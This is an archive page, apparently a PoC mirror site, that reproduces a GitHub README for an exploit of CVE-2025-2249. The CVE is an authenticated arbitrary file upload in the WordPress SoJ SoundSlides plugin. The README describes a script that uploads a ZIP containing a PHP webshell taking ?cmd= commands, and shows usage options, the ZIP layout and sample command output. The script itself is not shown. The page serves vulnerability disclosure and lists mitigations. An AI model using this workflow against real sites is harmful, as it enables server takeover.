Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2025-2249 PoC — SoJ Soundslides <= 1.2.2 - Authenticated (Contributor+) Arbitrary File Upload

Source
https://github.com/Nxploited/CVE-2025-2249
Associated Vulnerability
Title:SoJ Soundslides <= 1.2.2 - Authenticated (Contributor+) Arbitrary File Upload (CVE-2025-2249)
Description:The SoJ SoundSlides plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the soj_soundslides_options_subpanel() function in all versions up to, and including, 1.2.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.
Description
 WordPress SoJ SoundSlides Plugin <= 1.2.2 is vulnerable to Arbitrary File Upload
Readme

# 🔐 WordPress SoJ SoundSlides Plugin <= 1.2.2 - Authenticated Arbitrary File Upload

> ⚠️ **DISCLAIMER:** This exploit is for educational and authorized testing purposes only.

---

## 📌 Vulnerability Summary

- **Plugin:** SoJ SoundSlides  
- **Affected Versions:** <= 1.2.2  
- **Type:** Authenticated (Contributor+) Arbitrary File Upload  
- **Patch Status:** ❌ No official fix available

The SoJ SoundSlides plugin allows authenticated users with **Contributor or higher** roles to upload arbitrary ZIP files. Due to missing validation, attackers can upload PHP webshells that are extracted and executed from a web-accessible directory.

---

## 💥 Impact

An attacker with valid WordPress credentials can:

- 📦 Upload a ZIP archive containing a PHP shell
- 🖥️ Execute system commands remotely (`?cmd=`)
- 🔓 Gain unauthorized control of the site/server

---

## 🛠️ Usage

```bash
usage: CVE-2025-2249.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for CVE-2025-2249 | WordPress SoJ SoundSlides Plugin # By Nxploited | Khaled ALenazi,

options:
  -h, --help            show this help message and exit
  -u, --url URL         WordPress base URL
  -un, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password
```

| Argument  | Description                    |
|-----------|--------------------------------|
| `-u`      | WordPress base URL             |
| `-un`     | WordPress username             |
| `-p`      | WordPress password             |

---

## ✨ Features

- 🔍 Version check from plugin `readme.txt`
- 🧰 Auto-generates ZIP with required structure and webshell
- 📤 Exploits vulnerable upload endpoint
- 💻 Interactive command execution via uploaded shell

---

## 📂 ZIP File Structure

```
nxploit/
├── index.html
├── data/
│   └── data.xml
├── audio/
│   └── audio.mp3
└── nxploit.php  ← PHP shell (?cmd=)
```

---

## 🧪 Example

```bash
[*] Checking plugin version...
[+] Vulnerable version detected.
[*] Logging in...
[+] Login successful.
[*] Uploading shell...
[*] Shell uploaded: http://target/wp-content/uploads/SoundSlides/nxploit_shell/nxploit.php
> whoami
www-data
```


---

## 🛡️ Mitigation

- ❌ Disable or remove the plugin
- 🧱 Apply upload restrictions
- 🔍 Monitor `wp-content/uploads/` for unexpected `.php` files



> Built with ❤️ by [Nxploited | Khaled ALenazi]  
> For education, awareness, and defense.

---

## 🧠 Final Note

Security is everyone's responsibility. Always test ethically, report responsibly, and protect the web.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →